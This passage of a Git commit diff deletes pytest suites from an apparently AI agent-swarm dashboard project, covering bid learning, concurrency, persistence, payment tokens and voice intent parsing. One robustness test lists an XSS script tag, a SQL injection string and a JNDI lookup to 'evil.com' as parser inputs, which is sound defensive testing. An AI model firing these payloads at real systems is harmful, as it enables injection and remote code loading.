forked from Rockachopa/Timmy-time-dashboard
Memory Unification + Canonical Identity: -11,074 lines of homebrew (#119)
This commit is contained in:
committed by
GitHub
parent
785440ac31
commit
62ef1120a4
@@ -1,237 +0,0 @@
|
||||
"""Tests for swarm.learner — outcome tracking and adaptive bid intelligence."""
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
def tmp_learner_db(tmp_path, monkeypatch):
    """Point swarm.learner at a throwaway SQLite file for every test."""
    path = tmp_path / "swarm.db"
    monkeypatch.setattr("swarm.learner.DB_PATH", path)
    yield path
|
||||
|
||||
|
||||
# ── keyword extraction ───────────────────────────────────────────────────────
|
||||
|
||||
def test_extract_keywords_strips_stop_words():
    """Stop words are dropped while meaningful terms survive extraction."""
    from swarm.learner import _extract_keywords

    keywords = _extract_keywords("please research the security vulnerability")
    for stop_word in ("please", "the"):
        assert stop_word not in keywords
    for term in ("research", "security", "vulnerability"):
        assert term in keywords
|
||||
|
||||
|
||||
def test_extract_keywords_ignores_short_words():
    """Utterances made only of very short words yield no keywords at all."""
    from swarm.learner import _extract_keywords

    assert _extract_keywords("do it or go") == []
|
||||
|
||||
|
||||
def test_extract_keywords_lowercases():
    """Keyword extraction normalises input to lower case."""
    from swarm.learner import _extract_keywords

    keywords = _extract_keywords("Deploy Kubernetes Cluster")
    assert {"deploy", "kubernetes", "cluster"} <= set(keywords)
|
||||
|
||||
|
||||
# ── record_outcome ───────────────────────────────────────────────────────────
|
||||
|
||||
def test_record_outcome_stores_data():
    """A recorded winning bid shows up in the agent's metrics."""
    from swarm.learner import get_metrics, record_outcome

    record_outcome("t1", "agent-a", "fix the bug", 30, won_auction=True)

    metrics = get_metrics("agent-a")
    assert metrics.total_bids == 1
    assert metrics.auctions_won == 1
|
||||
|
||||
|
||||
def test_record_outcome_with_failure():
    """A won auction whose task failed counts as a failed task."""
    from swarm.learner import get_metrics, record_outcome

    record_outcome("t2", "agent-b", "deploy server", 50, won_auction=True, task_succeeded=False)

    metrics = get_metrics("agent-b")
    assert metrics.tasks_failed == 1
    assert metrics.success_rate == 0.0
|
||||
|
||||
|
||||
def test_record_outcome_losing_bid():
    """A losing bid is still counted as a bid but not as a win."""
    from swarm.learner import get_metrics, record_outcome

    record_outcome("t3", "agent-c", "write docs", 80, won_auction=False)

    metrics = get_metrics("agent-c")
    assert metrics.total_bids == 1
    assert metrics.auctions_won == 0
|
||||
|
||||
|
||||
# ── record_task_result ───────────────────────────────────────────────────────
|
||||
|
||||
def test_record_task_result_updates_success():
    """record_task_result flips a pending outcome to success and reports one row touched."""
    from swarm.learner import get_metrics, record_outcome, record_task_result

    record_outcome("t4", "agent-d", "analyse data", 40, won_auction=True)
    assert record_task_result("t4", "agent-d", succeeded=True) == 1

    metrics = get_metrics("agent-d")
    assert metrics.tasks_completed == 1
    assert metrics.success_rate == 1.0
|
||||
|
||||
|
||||
def test_record_task_result_updates_failure():
    """A failed task result drives the success rate to zero."""
    from swarm.learner import get_metrics, record_outcome, record_task_result

    record_outcome("t5", "agent-e", "deploy kubernetes", 60, won_auction=True)
    record_task_result("t5", "agent-e", succeeded=False)

    metrics = get_metrics("agent-e")
    assert metrics.tasks_failed == 1
    assert metrics.success_rate == 0.0
|
||||
|
||||
|
||||
def test_record_task_result_no_match_returns_zero():
    """Updating a nonexistent outcome touches zero rows."""
    from swarm.learner import record_task_result

    assert record_task_result("no-task", "no-agent", succeeded=True) == 0
|
||||
|
||||
|
||||
# ── get_metrics ──────────────────────────────────────────────────────────────
|
||||
|
||||
def test_metrics_empty_agent():
    """An agent with no history yields fully zeroed-out metrics."""
    from swarm.learner import get_metrics

    metrics = get_metrics("ghost")
    assert metrics.total_bids == 0
    assert metrics.win_rate == 0.0
    assert metrics.success_rate == 0.0
    assert metrics.keyword_wins == {}
|
||||
|
||||
|
||||
def test_metrics_win_rate():
    """Win rate is auctions won divided by total bids."""
    from swarm.learner import get_metrics, record_outcome

    outcomes = [
        ("t10", "research topic", 30, True),
        ("t11", "research other", 40, False),
        ("t12", "find sources", 35, True),
        ("t13", "summarize report", 50, False),
    ]
    for task_id, description, amount, won in outcomes:
        record_outcome(task_id, "agent-f", description, amount, won_auction=won)

    metrics = get_metrics("agent-f")
    assert metrics.total_bids == 4
    assert metrics.auctions_won == 2
    assert metrics.win_rate == pytest.approx(0.5)
|
||||
|
||||
|
||||
def test_metrics_keyword_tracking():
    """Keywords from successful tasks feed wins; failed tasks feed failures."""
    from swarm.learner import get_metrics, record_outcome, record_task_result

    for task_id, description, succeeded in (
        ("t20", "research security vulnerability", True),
        ("t21", "research market trends", False),
    ):
        record_outcome(task_id, "agent-g", description, 30, won_auction=True)
        record_task_result(task_id, "agent-g", succeeded=succeeded)

    metrics = get_metrics("agent-g")
    assert metrics.keyword_wins.get("research", 0) == 1
    assert metrics.keyword_wins.get("security", 0) == 1
    assert metrics.keyword_failures.get("research", 0) == 1
    assert metrics.keyword_failures.get("market", 0) == 1
|
||||
|
||||
|
||||
def test_metrics_avg_winning_bid():
    """The average winning bid ignores lost auctions entirely."""
    from swarm.learner import get_metrics, record_outcome

    record_outcome("t30", "agent-h", "task one", 20, won_auction=True)
    record_outcome("t31", "agent-h", "task two", 40, won_auction=True)
    record_outcome("t32", "agent-h", "task three", 100, won_auction=False)

    # (20 + 40) / 2 — the 100-sat losing bid must not be averaged in.
    assert get_metrics("agent-h").avg_winning_bid == pytest.approx(30.0)
|
||||
|
||||
|
||||
# ── get_all_metrics ──────────────────────────────────────────────────────────
|
||||
|
||||
def test_get_all_metrics_empty():
    """No recorded outcomes means an empty metrics map."""
    from swarm.learner import get_all_metrics

    assert get_all_metrics() == {}
|
||||
|
||||
|
||||
def test_get_all_metrics_multiple_agents():
    """Every agent with recorded outcomes appears under its own key."""
    from swarm.learner import get_all_metrics, record_outcome

    record_outcome("t40", "alice", "fix bug", 20, won_auction=True)
    record_outcome("t41", "bob", "write docs", 30, won_auction=False)

    everyone = get_all_metrics()
    assert "alice" in everyone
    assert "bob" in everyone
    assert everyone["alice"].auctions_won == 1
    assert everyone["bob"].auctions_won == 0
|
||||
|
||||
|
||||
# ── suggest_bid ──────────────────────────────────────────────────────────────
|
||||
|
||||
def test_suggest_bid_returns_base_when_insufficient_data():
    """With no bidding history the base bid is returned unchanged."""
    from swarm.learner import suggest_bid

    assert suggest_bid("new-agent", "research something", 50) == 50
|
||||
|
||||
|
||||
def test_suggest_bid_lowers_on_low_win_rate():
    """An agent losing nearly every auction should be nudged to bid lower."""
    from swarm.learner import record_outcome, suggest_bid

    # One win in ten bids → a very low win rate.
    for i in range(9):
        record_outcome(f"loss-{i}", "loser", "generic task description", 50, won_auction=False)
    record_outcome("win-0", "loser", "generic task description", 50, won_auction=True)

    assert suggest_bid("loser", "generic task description", 50) < 50
|
||||
|
||||
|
||||
def test_suggest_bid_raises_on_high_win_rate():
    """An agent winning every auction can afford to bid higher."""
    from swarm.learner import record_outcome, suggest_bid

    for i in range(5):
        record_outcome(f"win-{i}", "winner", "generic task description", 30, won_auction=True)

    assert suggest_bid("winner", "generic task description", 30) > 30
|
||||
|
||||
|
||||
def test_suggest_bid_backs_off_on_poor_success():
    """Winning auctions but failing the work should push bids upward (avoid winning)."""
    from swarm.learner import record_outcome, record_task_result, suggest_bid

    for i in range(4):
        task_id = f"fail-{i}"
        record_outcome(task_id, "failer", "deploy server config", 40, won_auction=True)
        record_task_result(task_id, "failer", succeeded=False)

    assert suggest_bid("failer", "deploy server config", 40) > 40
|
||||
|
||||
|
||||
def test_suggest_bid_leans_in_on_keyword_strength():
    """A strong record on matching keywords lets the agent bid more aggressively."""
    from swarm.learner import record_outcome, record_task_result, suggest_bid

    for i in range(4):
        task_id = f"sec-{i}"
        record_outcome(task_id, "sec-agent", "audit security vulnerability", 50, won_auction=True)
        record_task_result(task_id, "sec-agent", succeeded=True)

    # "security"/"audit" overlap with the track record above → lower bid.
    assert suggest_bid("sec-agent", "check security audit", 50) < 50
|
||||
|
||||
|
||||
def test_suggest_bid_never_below_one():
    """Downward adjustments are floored at one sat."""
    from swarm.learner import record_outcome, suggest_bid

    for i in range(5):
        record_outcome(f"cheap-{i}", "cheapo", "task desc here", 1, won_auction=False)

    assert suggest_bid("cheapo", "task desc here", 1) >= 1
|
||||
|
||||
|
||||
# ── learned_keywords ─────────────────────────────────────────────────────────
|
||||
|
||||
def test_learned_keywords_empty():
    """An agent with no history has learned nothing."""
    from swarm.learner import learned_keywords

    assert learned_keywords("nobody") == []
|
||||
|
||||
|
||||
def test_learned_keywords_ranked_by_net():
    """Learned keywords are ordered by net score (wins minus failures)."""
    from swarm.learner import learned_keywords, record_outcome, record_task_result

    # "security": 3 wins, 0 failures → net +3.
    for i in range(3):
        record_outcome(f"sw-{i}", "ranker", "audit security scan", 30, won_auction=True)
        record_task_result(f"sw-{i}", "ranker", succeeded=True)
    # "deploy": 1 win, 2 failures → net -1.
    record_outcome("dw-0", "ranker", "deploy docker container", 40, won_auction=True)
    record_task_result("dw-0", "ranker", succeeded=True)
    for i in range(2):
        record_outcome(f"df-{i}", "ranker", "deploy kubernetes cluster", 40, won_auction=True)
        record_task_result(f"df-{i}", "ranker", succeeded=False)

    ranked = learned_keywords("ranker")
    by_keyword = {entry["keyword"]: entry for entry in ranked}
    assert by_keyword["security"]["net"] > 0
    assert by_keyword["deploy"]["net"] < 0

    # Higher net score ranks first, so "security" precedes "deploy".
    order = [entry["keyword"] for entry in ranked]
    assert order.index("security") < order.index("deploy")
|
||||
@@ -1,444 +0,0 @@
|
||||
"""Scary path tests — the things that break in production.
|
||||
|
||||
These tests verify the system handles edge cases gracefully:
|
||||
- Concurrent load (10+ simultaneous tasks)
|
||||
- Memory persistence across restarts
|
||||
- L402 macaroon expiry
|
||||
- WebSocket reconnection
|
||||
- Voice NLU edge cases
|
||||
- Graceful degradation under resource exhaustion
|
||||
|
||||
All tests must pass with make test.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import concurrent.futures
|
||||
import sqlite3
|
||||
import threading
|
||||
import time
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from swarm.coordinator import SwarmCoordinator
|
||||
from swarm.tasks import TaskStatus, create_task, get_task, list_tasks
|
||||
from swarm import registry
|
||||
from swarm.bidder import AuctionManager
|
||||
|
||||
|
||||
class TestConcurrentSwarmLoad:
    """Exercise the swarm under concurrent task, bid, and spawn pressure."""

    def test_ten_simultaneous_tasks_all_assigned(self):
        """Posting ten tasks back-to-back leaves each with an ID and a live status."""
        coord = SwarmCoordinator()

        # A few personas so the auctions have someone to assign to.
        for persona in ("echo", "forge", "seer"):
            coord.spawn_persona(persona, agent_id=f"{persona}-load-001")

        posted = [coord.post_task(f"Task {i}: Analyze data set {i}") for i in range(10)]

        assert len(posted) == 10
        acceptable = [TaskStatus.BIDDING, TaskStatus.ASSIGNED, TaskStatus.COMPLETED]
        for task in posted:
            assert task.id is not None
            assert task.status in acceptable

    def test_concurrent_bids_no_race_conditions(self):
        """Five agents bidding in parallel all land in the auction state."""
        coord = SwarmCoordinator()
        task = coord.post_task("Concurrent bid test task")

        bidders = [f"agent-conc-{i}" for i in range(5)]

        def submit(agent_id):
            coord.auctions.submit_bid(task.id, agent_id, bid_sats=50)

        with ThreadPoolExecutor(max_workers=5) as pool:
            concurrent.futures.wait([pool.submit(submit, agent) for agent in bidders])

        auction = coord.auctions.get_auction(task.id)
        assert auction is not None
        # One bid per agent — nothing lost or duplicated under contention.
        assert len(auction.bids) == 5

    def test_registry_consistency_under_load(self):
        """Concurrent spawns never leave the registry missing a successful agent."""
        coord = SwarmCoordinator()

        def spawn(i):
            try:
                return coord.spawn_persona("forge", agent_id=f"forge-reg-{i}")
            except Exception:
                return None  # failed spawns are tolerated; only successes are checked

        with ThreadPoolExecutor(max_workers=10) as pool:
            futures = [pool.submit(spawn, i) for i in range(10)]
            outcomes = [f.result() for f in concurrent.futures.as_completed(futures)]

        registered_ids = {agent.id for agent in coord.list_swarm_agents()}
        for spawned in (r for r in outcomes if r is not None):
            assert spawned["agent_id"] in registered_ids

    def test_task_completion_under_load(self):
        """Rapid sequential completions all reach COMPLETED status."""
        coord = SwarmCoordinator()
        coord.spawn_persona("forge", agent_id="forge-complete-001")

        created = [create_task(f"Load test task {i}") for i in range(5)]

        for task in created:
            outcome = coord.complete_task(task.id, f"Result for {task.id}")
            assert outcome is not None
            assert outcome.status == TaskStatus.COMPLETED

        done_ids = {t.id for t in list_tasks(status=TaskStatus.COMPLETED)}
        for task in created:
            assert task.id in done_ids
|
||||
|
||||
|
||||
class TestMemoryPersistence:
    """Verify learner and routing state outlives the writing connection."""

    def test_outcomes_recorded_and_retrieved(self):
        """Recorded outcomes are visible through get_metrics."""
        from swarm.learner import get_metrics, record_outcome

        agent = "memory-test-agent"
        record_outcome("task-1", agent, "Test task", 100, won_auction=True)
        record_outcome("task-2", agent, "Another task", 80, won_auction=False)

        metrics = get_metrics(agent)
        assert metrics is not None
        assert metrics.total_bids >= 2

    def test_memory_persists_in_sqlite(self):
        """A fresh query (new connection) still sees previously written rows."""
        from swarm.learner import get_metrics, record_outcome

        agent = "persist-agent"
        record_outcome("persist-task-1", agent, "Description", 50, won_auction=True)

        # Re-querying simulates an in-process restart via a new connection.
        metrics = get_metrics(agent)
        assert metrics is not None
        assert metrics.total_bids >= 1

    def test_routing_decisions_persisted(self):
        """Logged routing decisions can be queried back by task id."""
        from swarm.routing import RoutingDecision, routing_engine

        # Make sure the backing table exists before writing.
        routing_engine._init_db()

        decision = RoutingDecision(
            task_id="persist-route-task",
            task_description="Test routing",
            candidate_agents=["agent-1", "agent-2"],
            selected_agent="agent-1",
            selection_reason="Higher score",
            capability_scores={"agent-1": 0.8, "agent-2": 0.5},
            bids_received={"agent-1": 50, "agent-2": 40},
        )
        routing_engine._log_decision(decision)

        history = routing_engine.get_routing_history(task_id="persist-route-task")
        assert len(history) >= 1
        assert any(entry.task_id == "persist-route-task" for entry in history)
|
||||
|
||||
|
||||
class TestL402MacaroonExpiry:
    """L402 macaroon issuance and verification edge cases."""

    def test_macaroon_verification_valid(self):
        """A macaroon verifies when paired with its invoice's real preimage."""
        from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
        from timmy_serve.payment_handler import payment_handler

        challenge = create_l402_challenge(100, "Test access")

        # Fetch the preimage from the invoice the challenge created.
        invoice = payment_handler.get_invoice(challenge["payment_hash"])
        assert invoice is not None

        assert verify_l402_token(challenge["macaroon"], invoice.preimage) is True

    def test_macaroon_invalid_format_rejected(self):
        """Garbage that is not a macaroon never verifies."""
        from timmy_serve.l402_proxy import verify_l402_token

        assert verify_l402_token("not-a-valid-macaroon", None) is False

    def test_payment_check_fails_for_unpaid(self):
        """Verification without a preimage on an unsettled invoice stays boolean."""
        from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
        from timmy_serve.payment_handler import payment_handler

        import base64

        challenge = create_l402_challenge(100, "Test")
        macaroon = challenge["macaroon"]

        # The payment hash is the third ':'-separated field of the decoded macaroon.
        decoded = base64.urlsafe_b64decode(macaroon.encode()).decode()
        payment_hash = decoded.split(":")[2]

        # The mock backend auto-settles, so force the invoice back to unpaid.
        invoice = payment_handler.get_invoice(payment_hash)
        if invoice:
            invoice.settled = False
            invoice.settled_at = None

        # Documents current behavior: mock mode may still auto-settle, so we
        # only require a boolean answer rather than a strict False.
        assert isinstance(verify_l402_token(macaroon, None), bool)
|
||||
|
||||
|
||||
class TestWebSocketResilience:
    """WebSocket plumbing must tolerate missing loops and absent clients."""

    def test_websocket_broadcast_no_loop_running(self):
        """_broadcast must swallow the no-running-event-loop RuntimeError."""
        from swarm.coordinator import SwarmCoordinator

        coord = SwarmCoordinator()
        try:
            coord._broadcast(lambda: None)
        except RuntimeError:
            pytest.fail("Broadcast should handle missing event loop gracefully")

    def test_websocket_manager_handles_no_connections(self):
        """Broadcasting to zero connected clients must not raise."""
        from infrastructure.ws_manager.handler import ws_manager

        try:
            # ws_manager's broadcast methods are async (scheduled via
            # create_task in real usage); full coverage belongs to an
            # integration test, so this only asserts clean importability.
            pass  # ws_manager methods are async, test in integration
        except Exception:
            pytest.fail("Should handle zero connections gracefully")

    @pytest.mark.asyncio
    async def test_websocket_client_disconnect_mid_stream(self):
        """Placeholder: requires a real WebSocket client (future integration test)."""
        pass
|
||||
|
||||
|
||||
class TestVoiceNLUEdgeCases:
    """detect_intent must survive empty, hostile, and non-English input."""

    def test_nlu_empty_string(self):
        """An empty utterance still yields an Intent object."""
        from integrations.voice.nlu import detect_intent

        intent = detect_intent("")
        assert intent is not None
        # Intents expose their classification via a .name attribute.
        assert hasattr(intent, "name")

    def test_nlu_all_punctuation(self):
        """Pure punctuation is parsed without crashing."""
        from integrations.voice.nlu import detect_intent

        assert detect_intent("...!!!???") is not None

    def test_nlu_very_long_input(self):
        """A ~10k character utterance finishes quickly and returns something."""
        from integrations.voice.nlu import detect_intent

        started = time.time()
        intent = detect_intent("word " * 2000)  # roughly 10k characters
        elapsed = time.time() - started

        assert elapsed < 5.0  # must not hang on oversized input
        assert intent is not None

    def test_nlu_non_english_text(self):
        """Assorted Unicode scripts and emoji are all handled."""
        from integrations.voice.nlu import detect_intent

        samples = [
            "こんにちは",  # Japanese
            "Привет мир",  # Russian
            "مرحبا",  # Arabic
            "🎉🎊🎁",  # Emoji
        ]
        for text in samples:
            assert detect_intent(text) is not None, f"Failed for input: {text}"

    def test_nlu_special_characters(self):
        """Injection-style payloads and control bytes must not crash the parser."""
        from integrations.voice.nlu import detect_intent

        payloads = [
            "<script>alert('xss')</script>",
            "'; DROP TABLE users; --",
            "${jndi:ldap://evil.com}",
            "\x00\x01\x02",  # Control characters
        ]
        for text in payloads:
            try:
                assert detect_intent(text) is not None
            except Exception as exc:
                pytest.fail(f"NLU crashed on input {repr(text)}: {exc}")
|
||||
|
||||
|
||||
class TestGracefulDegradation:
    """Subsystems must fall back cleanly when optional resources are absent."""

    def test_coordinator_without_redis_uses_memory(self):
        """SwarmComms publishes via its in-memory fallback when Redis is absent."""
        from swarm.comms import SwarmComms

        comms = SwarmComms()
        try:
            comms.publish("test:channel", "test_event", {"data": "value"})
        except Exception as exc:
            pytest.fail(f"Should work without Redis: {exc}")

    def test_agent_without_tools_chat_mode(self):
        """With toolkit and LLM stripped, the executor still returns a result dict."""
        from swarm.tool_executor import ToolExecutor

        executor = ToolExecutor("test", "test-agent")
        # Simulate an environment where no tools or LLM are available.
        executor._toolkit = None
        executor._llm = None

        outcome = executor.execute_task("Do something")
        assert isinstance(outcome, dict)
        assert "result" in outcome

    def test_lightning_backend_mock_fallback(self):
        """The mock Lightning backend is returned and can mint invoices."""
        from lightning import get_backend
        from lightning.mock_backend import MockBackend

        backend = get_backend("mock")
        assert isinstance(backend, MockBackend)

        invoice = backend.create_invoice(100, "Test")
        assert invoice.payment_hash is not None
|
||||
|
||||
|
||||
class TestDatabaseResilience:
    """SQLite-backed stores under concurrent reads and duplicate writes."""

    def test_sqlite_handles_concurrent_reads(self):
        """Twenty parallel reads of one task all return the same row."""
        from swarm.tasks import create_task, get_task

        task = create_task("Concurrent read test")

        with ThreadPoolExecutor(max_workers=10) as pool:
            futures = [pool.submit(get_task, task.id) for _ in range(20)]
            fetched = [f.result() for f in concurrent.futures.as_completed(futures)]

        assert all(row is not None for row in fetched)
        assert all(row.id == task.id for row in fetched)

    def test_registry_handles_duplicate_agent_id(self):
        """Registering the same agent id twice must not corrupt the registry."""
        from swarm import registry

        agent_id = "duplicate-test-agent"

        # First registration, then a second with the same id — the registry
        # should update or otherwise tolerate the duplicate without raising.
        registry.register(name="Test Agent", agent_id=agent_id)
        registry.register(name="Test Agent Updated", agent_id=agent_id)

        assert registry.get_agent(agent_id) is not None
|
||||
@@ -428,23 +428,3 @@ class TestSelfModifyRoutes:
|
||||
resp = client.post("/self-modify/run", data={"instruction": "test"})
|
||||
assert resp.status_code == 403
|
||||
|
||||
|
||||
# ── DirectToolExecutor integration ────────────────────────────────────────────
|
||||
|
||||
|
||||
class TestDirectToolExecutor:
    """DirectToolExecutor behavior when self-modification is disabled."""

    def test_code_task_falls_back_when_disabled(self):
        """Code-editing instructions fall back to the simulated path."""
        from swarm.tool_executor import DirectToolExecutor

        executor = DirectToolExecutor("forge", "forge-test-001")
        outcome = executor.execute_with_tools("modify the code to fix bug")

        # self_modify_enabled=False, so the simulated fallback must answer.
        assert isinstance(outcome, dict)
        assert "result" in outcome or "success" in outcome

    def test_non_code_task_delegates_to_parent(self):
        """Non-code instructions are delegated to the parent executor."""
        from swarm.tool_executor import DirectToolExecutor

        executor = DirectToolExecutor("echo", "echo-test-001")
        assert isinstance(executor.execute_with_tools("search for information"), dict)
|
||||
|
||||
Reference in New Issue
Block a user